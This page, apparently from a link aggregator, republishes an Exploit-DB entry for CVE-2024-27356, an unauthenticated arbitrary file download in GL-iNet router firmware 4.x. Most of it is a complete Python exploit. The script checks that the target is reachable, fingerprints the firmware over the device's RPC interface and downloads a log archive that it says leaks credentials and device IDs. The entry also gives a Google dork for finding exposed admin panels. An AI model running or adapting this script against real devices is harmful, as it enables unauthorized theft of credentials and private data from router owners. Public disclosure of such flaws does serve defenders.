[remote] GL-iNet MT6000 4.5.5 - Arbitrary File Download
source link: https://www.exploit-db.com/exploits/51942
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
GL-iNet MT6000 4.5.5 - Arbitrary File Download
Exploit:
/
# Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
# CVE: CVE-2024-27356
# Google Dork: intitle:"GL.iNet Admin Panel"
# Date: 2/26/2024
# Exploit Author: Bandar Alharbi (aggressor)
# Vendor Homepage: www.gl-inet.com
# Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
# Tested Model: GL-X3000 Spitz AX
# Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
import sys
import requests
import json
requests.packages.urllib3.disable_warnings()
h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
def DoesTarExist():
r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
if r.status_code == 200:
f = open("logread.tar", "wb")
f.write(r.content)
f.close()
print("[*] Full logs archive `logread.tar` has been downloaded!")
print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
return True
else:
print("[*] The `logread.tar` archive does not exist however ... try again later!")
return False
def isVulnerable():
r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
if r1.status_code == 500 and "nginx" in r1.text:
r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
if "Admin-Token" in r2.text:
j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
ver = r3.json()['result']['firmware_version']
model = r3.json()['result']['model']
if ver.startswith(('4.')):
print("[*] Firmware version (%s) is vulnerable!" %ver)
print("[*] Device model is: %s" %model)
return True
print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
return False
def isAlive():
try:
r = requests.get(url, verify=False, timeout=30, headers=h)
if r.status_code != 200:
print("[*] Make sure the target's web interface is accessible!")
return False
elif r.status_code == 200:
print("[*] The target is reachable!")
return True
except Exception:
print("[*] Error occurred when connecting to the target!")
pass
return False
if __name__ == '__main__':
if len(sys.argv) != 2:
print("exploit.py url")
sys.exit(0)
url = sys.argv[1]
url = url.lower()
if not url.startswith(('http://', 'https://')):
print("[*] Invalid url format! It should be http[s]://<domain or ip>")
sys.exit(0)
if url.endswith("/"):
url = url.rstrip("/")
print("[*] GL.iNet Unauthenticated Full Logs Downloader")
try:
if (isAlive() and isVulnerable()) == (True and True):
DoesTarExist()
except KeyboardInterrupt:
print("[*] The exploit has been stopped by the user!")
sys.exit(0)
Recommend
-
10
ping and inet_aton, revisited Last year, I wrote about dissecting ping and glibc to find out why the one on my system (and many others) supports things like 192.168.01234 a...
-
5
iNet Network Scanner 2.6.4 特别版_Mac软件_IT密码了解安全风险并控制您的网络。这个易于使用的应用程序甚至向没有经验的用户概述了计算机网络。有人在你不知情的情况下使用你的网络吗?哪些设备目前在线?哪些访问端口是开放的?提供哪些服务?你的路由器的IP...
-
5
IPv4 addresses are silly, inet_aton(3) doubly so. October 28th, 2021 128 bit IPv6 addresses are cute and all, but how about... IPv∞? $ curl -s -v -I http://3010966065296825858750772020886900491...
-
1
GL.iNet路由器刷openwrt系统GL.iNet路由器是一款刷系统神器,价格低廉,性能卓越和百刷不死的U-boot启动。 首先先安装 OpenWrt 系统,刚开始刷路由器系统的时候有点懵,不知道应该刷什么系统,什么版本!后来经过摸索,整理出一条思路。其实路由器刷...
-
7
Vulnerabilities and Hardware Teardown of GL.iNET GL-MT300N-V2 Router Original text by
-
7
Gl-inet AXT1800 修改国家代码 root@GL-AXT1800:~# cat /proc/mtd dev: size erasesize name mtd0: 00180000 00020000 "0:SBL1" mtd1: 00100000 00020000 "0:MIBIB" mtd2: 00380000 00020000 "0:QSEE" mtd3:...
-
3
首页技术宅路由刷机GL.iNet AR300M 路由器刷机 openwrt 22.03.5 系统
-
1
GL.iNet AR300M v3.216 Remote Code Execution - CVE-2023-46456 Exploit...
-
1
GL.iNet AR300M v4.3.7 Arbitrary File Read - CVE-2023-46455 Exploit...
-
1
GL.iNet AR300M v4.3.7 Remote Code Execution - CVE-2023-46454 Exploit...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK